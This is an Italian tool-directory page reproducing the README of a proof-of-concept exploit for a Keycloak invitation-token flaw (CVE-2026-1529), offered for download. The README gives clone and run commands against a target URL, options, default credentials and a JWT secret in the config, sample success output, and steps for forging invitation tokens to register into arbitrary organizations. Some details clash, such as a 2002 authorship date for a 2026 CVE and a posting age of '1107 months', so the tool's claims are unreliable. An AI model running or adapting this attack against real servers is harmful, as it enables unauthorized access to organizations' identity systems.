Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — CVE-2026-1529 (PoC) è una vulnerabilità critica in Keycloak che consente la registrazione non autorizzata in organizzazioni tramite una validazione impropria del token di invito. Questo strumento di exploit dimostra la vulnerabilità manipolando i token JWT per registrare utenti in organizzazioni non autorizzate. | Kitploit
Strumenti/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHub

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Vedi Repository
1107 mesi faNon ancora revisionato

Informazioni

CVE-2026-1529 (PoC) è una vulnerabilità critica in Keycloak che consente la registrazione non autorizzata in organizzazioni tramite una validazione impropria del token di invito. Questo strumento di exploit dimostra la vulnerabilità manipolando i token JWT per registrare utenti in organizzazioni non autorizzate.

Condividi

CVE-2026-1529 Strumento di exploit per Keycloak

Keycloak: registrazione non autorizzata in organizzazioni tramite una validazione non corretta del token di invito


Esclusione di responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza. Utilizzalo solo su sistemi per cui disponi di un'autorizzazione esplicita al test. L'accesso non autorizzato a sistemi informatici è illegale e contrario all'etica. Gli autori di questo strumento non sono responsabili di eventuali usi impropri o danni causati da questo software.

Creato da: f3ds cr3w est, 2002


Panoramica

CVE-2026-1529 è una vulnerabilità critica in Keycloak che consente la registrazione non autorizzata in organizzazioni tramite una validazione non corretta del token di invito. Questo strumento di exploit dimostra la vulnerabilità manipolando i token JWT per registrare utenti in organizzazioni non autorizzate.

Dettagli tecnici

  • ID CVE: CVE-2026-1529
  • Software interessato: Keycloak (org.keycloak.services.resources.organizations)
  • Punteggio CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vettore di attacco: Rete
  • Complessità dell'attacco: Bassa
  • Impatto: Accesso non autorizzato alle risorse dell'organizzazione

Descrizione della vulnerabilità

La vulnerabilità risiede nel processo di validazione dei token JWT per gli inviti alle organizzazioni. Gli attaccanti possono manipolare i campi org_id ed email nel payload JWT, consentendo loro di registrare utenti in qualsiasi organizzazione senza un'adeguata autorizzazione.


Installazione

Prerequisiti

  • Python 3.7 o superiore
  • gestore di pacchetti pip

Configurazione

  1. Clona o scarica lo strumento di exploit:
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installa le dipendenze richieste:
pip install -r requirements.txt
  1. Rendi eseguibile lo script di exploit:
chmod +x keycloak-exploit.py

Utilizzo

Utilizzo di base

# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

Utilizzo avanzato

# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

Opzioni della riga di comando

OpzioneDescrizioneObbligatoria
targetURL Keycloak di destinazione (IP o dominio)Sì
-t, --tokenToken di invito personalizzato da utilizzareNo
-o, --org-idID organizzazione personalizzatoNo
-c, --configPercorso del file di configurazioneNo
-d, --debugAbilita i log di debugNo
-v, --versionMostra le informazioni sulla versioneNo
-h, --helpMostra il messaggio di aiutoNo

Output

Exploit riuscito

Quando l'exploit riesce, vedrai un output simile a:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Exploit fallito

Se l'exploit fallisce, vedrai:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Struttura del progetto

CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Configurazione

Configurazione predefinita

Lo strumento utilizza un file di configurazione predefinito (config/default_config.json) con le seguenti impostazioni:

{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configurazione personalizzata

Puoi creare un file di configurazione personalizzato e utilizzarlo con l'opzione -c:

{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Dettagli tecnici

Processo di exploit

  1. Analisi del target: verifica se il target è un'istanza Keycloak vulnerabile
  2. Generazione del token: genera o utilizza un token di invito personalizzato
  3. Manipolazione del token: manipola il payload JWT per modificare l'ID dell'organizzazione
  4. Registrazione dell'utente: registra un utente utilizzando il token manipolato
  5. Test di accesso: verifica che l'utente creato possa accedere
  6. Generazione del report: crea un report dettagliato dell'exploit

Manipolazione del JWT

Lo strumento sfrutta la validazione JWT non corretta:

  1. Decodificando il token JWT senza verifica della firma
  2. Modificando il campo org_id per puntare a un'organizzazione diversa
  3. Modificando il campo email se necessario
  4. Ricodificando il token con il payload manipolato

Considerazioni sulla sicurezza

  • Lo strumento utilizza una corretta gestione degli errori e la registrazione dei log
  • Tutte le richieste di rete includono header appropriati
  • La validazione degli input viene eseguita su tutti gli input dell'utente
  • Lo strumento rispetta i codici di risposta del server del target

Risoluzione dei problemi

Problemi comuni

  1. Errori di connessione

    • Verifica che l'URL del target sia accessibile
    • Verifica che il target sia un'istanza Keycloak
    • Controlla la connettività di rete e le impostazioni del firewall
  2. Errori di validazione del token

    • Assicurati che il formato del token sia corretto
    • Controlla che il token contenga i campi richiesti (org_id, email, invitation_type)
    • Verifica che il token non sia scaduto
Scarica lo strumento